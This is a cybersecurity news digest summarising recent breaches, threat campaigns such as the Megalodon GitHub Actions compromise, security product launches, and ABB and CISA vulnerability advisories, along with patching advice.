News

India's CERT-In has issued a warning about the increasing threat of artificial intelligence-driven cyberattacks, as hackers leverage advanced automated tools to breach systems. The advisory highlights how attackers are utilizing AI technologies to enhance their attack capabilities, enabling more sophisticated and targeted campaigns against organizations and individuals. CERT-In recommends strengthening security measures and maintaining vigilant monitoring of network activities. Users are advised to keep systems updated with latest patches and implement robust security protocols to defend against these evolving threats. Source: sarkaritel.com

A coordinated cyber attack called Megalodon compromised over 5,500 public GitHub repositories by injecting malicious commits into GitHub Actions workflows. Researchers at SafeDep detected the campaign on May 18, which pushed 5,718 harmful commits within six hours using stolen credentials. The attack modified workflow files to include base64-encoded scripts designed to steal sensitive data like cloud credentials, SSH keys, and OIDC tokens during code execution. Major targets included repositories from Wiznet, Tiledesk, and persian-tools projects. Security researchers recommend monitoring unexpected workflow runs and reviewing cloud audit logs for suspicious token requests. The operation bore similarities to previous TeamPCP attacks, using backdated commits to conceal malicious activity timing. Source: SafeDep and OX Security Research.

AppOmni has launched Marlin AI, a tool designed to automatically detect and investigate misconfigurations in Software-as-a-Service (SaaS) applications used by enterprises. The AI system analyzes security vulnerabilities across cloud environments and traces related suspicious activities within organizational networks. It provides detailed remediation recommendations to address identified issues. However, the system stops short of implementing fixes automatically, requiring human approval before taking corrective actions. This approach balances efficiency with safety, allowing security teams to review recommendations before deployment. The development highlights growing reliance on AI for managing complex cloud security challenges in modern enterprises. Source: SecurityWeek.

Nimbus Manticore, an Iranian advanced persistent threat (APT) group, continues targeting aviation and software companies with newly upgraded hacking tools. The group has maintained its cyber operations during and after recent US military activities against Iran. This represents an ongoing threat to critical infrastructure and technology sectors globally. Indian organizations in aviation and software development should enhance their security measures, including employee awareness training, network monitoring, and incident response protocols. Organizations are advised to patch vulnerabilities promptly and implement multi-factor authentication to mitigate risks from such state-sponsored cyber threats. Source: SecurityWeek.

A significant data breach at 7-Eleven has compromised personal information of over 185,000 individuals. The leaked data includes sensitive details such as names, dates of birth, postal addresses, and Social Security numbers, as confirmed by state government records. This incident highlights the vulnerability of retail chains to cyber attacks and the risks customers face when their information is stored by large corporations. Affected individuals should monitor their accounts for suspicious activity and consider identity theft protection measures. Source: State Government Security Notice.

US federal authorities have successfully shut down a large-scale tech-support scam operation that involved participants from India and the United States working in coordination. The scam typically targeted unsuspecting users by posing as legitimate technical support representatives, convincing victims to grant remote access to their devices or provide sensitive information. The operation involved multiple individuals across both countries in various roles, from executing the scams to managing financial aspects. This takedown represents a significant enforcement action against cross-border cybercriminal networks that have cost consumers substantial amounts through fraudulent technical support claims. Source: IndiaWest.

Microsoft is rolling out a new feature in Defender for Endpoint that automatically isolates infected computers to prevent attackers from spreading across networks. This capability detects when a system is compromised and disconnects it from the network, blocking lateral movement attempts by cybercriminals. The feature is currently in testing phase and aims to reduce response time during security incidents. For Indian organizations relying on Microsoft security tools, this addition strengthens endpoint protection by minimizing damage from breaches before manual intervention occurs. Source: Original announcement.

Reform UK leader Nigel Farage claims Russian hackers infiltrated his phone and disclosed information about a £5 million financial gift. However, cybersecurity specialists have expressed skepticism, requesting concrete evidence to support the allegations. The incident highlights growing concerns about political figures being targeted by state-sponsored cyber operations. Experts emphasize that without substantiated technical proof, such claims remain unverified. This case underscores the importance of proper incident investigation and transparent communication when reporting potential breaches. Source: The Guardian.

ABB has identified critical vulnerabilities in its Ability Camera Connect software versions 1.5.0.14 and below, stemming from an outdated VLC media player component (version 2.2.4). The vulnerabilities include heap-based buffer overflow and integer overflow issues that could allow attackers to crash the system or execute arbitrary code. The CVSS score is 9.8, indicating critical severity. ABB has released updates to address these flaws. The software is deployed globally across critical infrastructure sectors including energy, communications, and manufacturing. Users are advised to upgrade to patched versions immediately. Source: ABB Security Advisory.

ABB has disclosed a buffer over-read vulnerability (CVE-2025-7745) affecting its AC500 V2 industrial controller used in critical manufacturing, energy, and water sectors worldwide. Attackers exploiting this flaw could intercept fragments of previously sent Modbus telegrams from the programmable logic controller. The vulnerability affects versions 2.5.2 and earlier. The CVSS score of 5.8 indicates medium severity with network-based access possible without authentication. ABB released firmware version 2.5.3 (2016) and later versions to address the issue. Industrial organizations operating AC500 V2 systems should prioritize updating to patched firmware versions immediately. Source: CISA.

ABB has identified a heap memory overflow vulnerability (CVE-2025-5517) affecting multiple versions of its Terra AC electric vehicle charging stations worldwide. Attackers could exploit unencrypted OCPP messages to compromise affected chargers, potentially gaining remote control and altering firmware behavior. Impacted models include UL40/80A, UL32A, MID/CE, and JP variants across various firmware versions. ABB recommends users immediately update to patched versions: 1.8.33 or 1.8.34 depending on model. The company also advises against using unencrypted HTTP connections between chargers and management systems, despite OCPP protocol allowing it, to prevent malicious interference.

The US Cybersecurity and Infrastructure Security Agency (CISA) has identified a new actively exploited vulnerability in the LiteSpeed cPanel Plugin (CVE-2026-48172) that allows privilege escalation. The flaw has been added to CISA's Known Exploited Vulnerabilities Catalog, which tracks security weaknesses actively used by cyber criminals. While CISA's mandatory patching directive applies only to US federal agencies, the organization urges all businesses and organizations to prioritize fixing such vulnerabilities immediately. Privilege escalation flaws are commonly exploited by attackers to gain unauthorized system access. Organizations should review their systems and apply available patches promptly to prevent exploitation. Source: CISA.